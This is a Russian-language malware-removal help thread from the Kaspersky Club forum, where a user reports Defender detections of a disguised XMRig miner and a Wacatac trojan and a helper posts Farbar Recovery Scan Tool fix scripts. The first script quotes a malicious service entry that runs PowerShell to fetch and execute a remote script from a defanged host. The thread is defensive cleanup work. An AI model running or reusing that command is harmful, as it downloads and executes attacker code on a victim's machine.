Перейти к содержанию
Правила раздела
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m

ewixis

Автор ewixis
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

ewixis

ewixis

Опубликовано
Опубликовано (изменено)

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

 

Касперский и докторвеб - ничего не находят
 Farbar Recovery Scan Tool
показал следущее

Addition.txt FRST.txt

Изменено пользователем ewixis
  • ewixis изменил название на Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m
thyrex

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1221974024-4211864995-550959383-1001\...\Run: [AMDNoiseSuppression] => "C:\Windows\system32\AMD\ANR\AMDNoiseSuppression.exe" (Нет файла)
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 MicrosoftConsole; cmd.exe /c powershell.exe irm \"$(irm hxxps://uggsboots.ca/domain)/script?id=MzC5mRi0yY&tag=HWIDSpoofer\" ^| iex [X] <==== ВНИМАНИЕ
File: C:\ProgramData\RuntimeBroker.exe
File: C:\ProgramData\fontdrvhost.exe
FirewallRules: [TCP Query User{2D4AF635-8E99-4B99-B13E-52DF22106299}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{5A86FE62-BC0C-424C-B4D4-2B34520C0D83}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{F5DA0C92-AF5B-4043-A03E-475253806968}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{62A1EF4B-1479-4DB8-AD83-50DC7F2BF843}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{B003717D-8F91-4BBA-952B-FA55A304FEA1}] => (Block) C:\Program Files\BorisFX\ContinuumAE\13\utilities\bfx-version-update\bfx-version-update.exe => Нет файла
FirewallRules: [{858B83CD-9DD2-45F8-8E08-5638F7C78090}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{46670F30-615C-49C3-B504-8E9A944AB6D2}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{AC143033-55F5-4302-BFDB-EDC9D82B15F9}] => (Allow) C:\Program Files\Red Giant\Services\Red Giant Service.exe => Нет файла
FirewallRules: [{589AB3E0-0316-4B13-869A-227AB8866435}] => (Allow) C:\Program Files\Maxon\Tools\mxredirect.exe => Нет файла
AlternateDataStreams: C:\ProgramData:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData:DNS [40]
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\Users\All Users:2c21b77e [1262]
AlternateDataStreams: C:\Users\All Users:DNS [40]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\Все пользователи:2c21b77e [1262]
AlternateDataStreams: C:\Users\Все пользователи:DNS [40]
AlternateDataStreams: C:\Users\Все пользователи:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData\Application Data:DNS [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhioihinfh [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjiiiio [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`vovtfe.qpsu.obnfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk:F20EF51E1F [3442]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [8202]
AlternateDataStreams: C:\Users\UserNC\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\Application Data:DNS [40]
AlternateDataStreams: C:\Users\UserNC\Application Data:NT [40]
AlternateDataStreams: C:\Users\UserNC\Downloads\jjsploit_8.14.3_x64_en-US.msi:MBAM.Zone.Identifier [180]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:DNS [40]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\UserNC\Documents\GTA San Andreas User Files:2c21b77e [1262]
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

thyrex

thyrex

Опубликовано
Опубликовано
2 часа назад, ewixis сказал:

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

Защитник справился сам, файлов на компьютере нет.


1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Detections.log"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\quick\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\resource\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\system\*.*"
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Bloodii
      Trojan:MSIL/Injector.AH!MTB
      Автор Bloodii
      Через временные промежутки выскакивает обнаружение. Первый скрин долбит комп.



      HOME-PC_2026-05-04_10-04-51_v5.0.5v x64.7z
    • mkukgh
      [РЕШЕНО] Поймал MEM:Trojan.Win32.SEPEH.gen
      Автор mkukgh
      Добрый день. Каспер находит сабж, но не устраняет проблему, долго ждал после предложения лечить с перезагрузкой, но без результата, сейчас каспер находит угрозы в файлах windows\system32\winlogon.exe и svchost.exe на скриншоте, устранять или нет? файлы системный критичные, боюсь нажимать "устранить". Логи приложил. Спасибо.

      CollectionLog-2026.04.10-14.28.zip
    • BReDD
      Trojan:PowerShell/Bynoco. RR!amc
      Автор BReDD
      Подскажите плз, активатором KMS запустил майнера и этого гада (Trojan:PowerShell/Bynoco.RR!ams) на свой ПК с ОС Win 10х64. C помощью KRD вычистил зловредов, нашел кучу исключений в Windows Defender, удалил все. Так же капитально вычистил планировщик и автозапуск. Не трогал лишь службы, но там ничего криминального не заметил. Вроде все норм, проверка показывает, что ничего нет, но комп стал медленнее грузиться и значки на панели и в трее стали выходить с задержкой 3-5 минут. Чувствую, что где тоеще хвосты есть, возможно в реестре, но не могу найти. Создание нового юзера тоже ничего не дало. Есть ли средство, как убрать последствия за этим трояном?
       
      Сообщение от модератора thyrex Перенесено из темы
    • Mikhazen
      Скачал вирус "Trojan.Python.Obfus.f"
      Автор Mikhazen
      Что мне делать. Кинули ссылку и скачался файл, открыл его в Пайтон 3.14.... закинул на вирус тотал и мне Касперский кинул детект. Trojan.Python.Obfus.f . на сайте Касперского пишет такое, что обращался к именам 
       
      BSS:Trojan.Win32.Generic
       
      HEUR:Trojan-Dropper.Python.Obfus.gen
       
      Trojan.Python.Agent.og
       
      Я удалил сам текстовый файл crypted.py, но память начала грузиться до 50%, антималвэйр на цп ≈10-20 процентов кидает. Что делать? Есть ли способ без сноса винды? Т.к. там все файлы по работе
    • Artemnehacker
      поймал вирус стилер через анидеск
      Автор Artemnehacker
      Я был на проверке читов в майнкрафте через андисек мне закинули мне вредоносную програму предварительно отключив антивирус. После проверки читов, я запустил антивирус обратно (windows defender) после чего мне высветилсь плашка readme и потом (windows defender) удалил вирус , часть файлов было зашифровано в формате TOK, и украдены сеансы дискорд телеграм. Спустя 2 недели начала шалить винда, и появляться черные квадраты на обоях + начала нагриватся видеокарта. Хочу проверить удалил ли я вирус. 
      CollectionLog-2026.03.27-14.23.zip
×
×
  • Создать...